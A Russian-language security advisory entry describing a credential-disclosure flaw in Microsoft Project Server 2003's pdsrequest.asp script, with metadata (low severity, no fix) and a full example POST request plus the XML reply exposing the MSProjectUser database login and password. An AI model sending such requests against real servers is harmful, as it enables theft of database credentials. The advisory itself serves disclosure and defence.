Дата публикации: | 19.12.2006 |
Дата изменения: | 05.04.2009 |
Всего просмотров: | 3014 |
Опасность: | Низкая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: | Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Microsoft Project Server 2003 |
Уязвимые версии: Microsoft Project Server 2003, возможно другие версии.
Описание: Уязвимость существует из-за ошибки при обработке POST запросов в сценарии projectserver/logon/pdsrequest.asp. Удаленный пользователь может получить имя пользователя и пароль к учетной записи MSProjectUser. Пример:
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0 Accept: */* Accept-Language: en-nz Pragma: no-cache Host: SERVER Content-length: 87 Proxy-Connection: Keep-Alive Cookie: PjSessionID=<valid cookie> <Request> <GetInitializationData> <Release>1</Release> </GetInitializationData> </Request> <Reply> <HRESULT>0</HRESULT> <STATUS>0</STATUS> <UserName>theuser</UserName> <GetInitializationData> <GetLoginInformation> <DBType>0</DBType> <DVR>{SQLServer}</DVR> <DB>ProjectServer</DB> <SVR>SERVER</SVR> <ResGlobalID>1</ResGlobalID> <ResGlobalName>resglobal</ResGlobalName> <UserName>MSProjectUser</UserName> <---- <Password>sekretpass</Password> <---- <UserNTAccount>SERVER\USER</UserNTAccount> </GetLoginInformation> </Reply> URL производителя: www.microsoft.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | Project Server 2003 - Credential Disclosure |